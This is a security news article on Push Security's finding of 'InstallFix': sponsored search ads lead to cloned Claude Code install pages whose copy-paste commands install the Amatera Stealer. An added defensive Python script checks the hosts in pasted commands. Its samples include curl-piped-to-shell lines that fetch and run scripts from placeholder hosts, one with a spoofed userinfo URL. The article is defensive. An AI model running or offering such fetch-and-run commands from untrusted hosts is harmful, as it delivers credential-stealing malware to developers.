The success of Anthropic's Claude Code and other AI coding tools is being leveraged by a new version of the ClickFix method. The threat campaign, which blends social engineering and malvertising, was found by researchers at Push Security.

The research team discovered that Google-sponsored links for searches like "Claude Code," "Claude Code install," and "Claude Code CLI" were the only way that phony Claude Code install pages were propagating. Jacques Louw, co-founder and chief product officer (CPO) of Push Security, stated in a blog post released on Friday that the fake installation pages for Anthropic's coding assistant are nearly identical to the original.

However, the Amatera Stealer malware, which can steal developers' credentials and grant attackers access to enterprise development environments, is deployed when victims copy the malicious install commands from the clone sites. Although this method, which Push Security refers to as "InstallFix," isn't particularly novel, Louw clarified that attackers have noticed that users are more likely to just copy and paste commands into their systems and run them. He says, "I think this campaign is specifically aimed at Claude Code because it's one of the tools (if not the tool) being adopted the fastest across the board."

"The high rate of new account creations we see across our customers for Anthropic products mirrors this."

Push Security cautioned that the threat actors responsible for the InstallFix attacks are using domains from reputable providers like Tencent EdgeOne, Cloudflare Pages, and Squarespace, which seem harmless and blend in with regular traffic activity, in addition to abusing Google's sponsored links. According to Louw, Push Security has noticed this kind of abuse on almost all phishing websites and malicious links these days.

When copying and pasting commands into their terminals, users should exercise extreme caution and take extra time to confirm that the domains supplying these commands are legitimate.
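One way to turn that domain check into a pre-paste habit, shown as an added example that is not from Push Security or the article: the script extracts every URL from a copied install command and compares the host, exactly, against an allowlist. `TRUSTED_HOSTS` and all sample hostnames are constructed placeholders; replace them with hosts you have verified out-of-band.

```python
import re
from urllib.parse import urlsplit

# Assumption: placeholder for hosts verified out-of-band (vendor docs, bookmarks).
TRUSTED_HOSTS = {"install.vendor.example"}

# URLs end at whitespace, quotes, or shell metacharacters such as | ; ) < >
URL_RE = re.compile(r"https?://[^\s'\"|;)<>]+", re.IGNORECASE)

def check_command(command, trusted=TRUSTED_HOSTS):
    """Return (url, host, verdict) for every URL found in a pasted command."""
    findings = []
    for url in URL_RE.findall(command):
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").rstrip(".")
        except ValueError:
            findings.append((url, "", "reject: unparseable URL"))
            continue
        if parts.scheme != "https":
            verdict = "reject: not https"
        elif parts.username is not None:
            # Text before '@' is userinfo; the real host is what follows it.
            verdict = "reject: userinfo before host"
        elif host.startswith("xn--") or ".xn--" in host:
            verdict = "reject: punycode host"
        elif host in trusted:
            # Exact match only: a trusted name used as a subdomain label
            # of a shared hosting domain does not pass.
            verdict = "ok"
        else:
            verdict = "reject: host not on allowlist"
        findings.append((url, host, verdict))
    return findings

def hosts_all_trusted(command, trusted=TRUSTED_HOSTS):
    """True only if the command contains at least one URL and all pass."""
    findings = check_command(command, trusted)
    return bool(findings) and all(v == "ok" for _, _, v in findings)

if __name__ == "__main__":
    # Constructed sample commands, not taken from the campaign.
    samples = [
        "curl -fsSL https://install.vendor.example/install.sh | bash",
        "curl -fsSL https://install.vendor.example.pages.example/install.sh | bash",
        "curl -fsSL https://install.vendor.example@cdn.pages.example/i.sh | sh",
    ]
    for cmd in samples:
        print(hosts_all_trusted(cmd), check_command(cmd))
```

A passing result only says the command fetches from hosts you already trust; it does not vouch for what the downloaded script does.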

Although Push Security supplied indicators of compromise (IoCs) for the InstallFix attacks, Louw stated that the information is not very useful because domains used in campaigns such as this one typically have a short lifespan.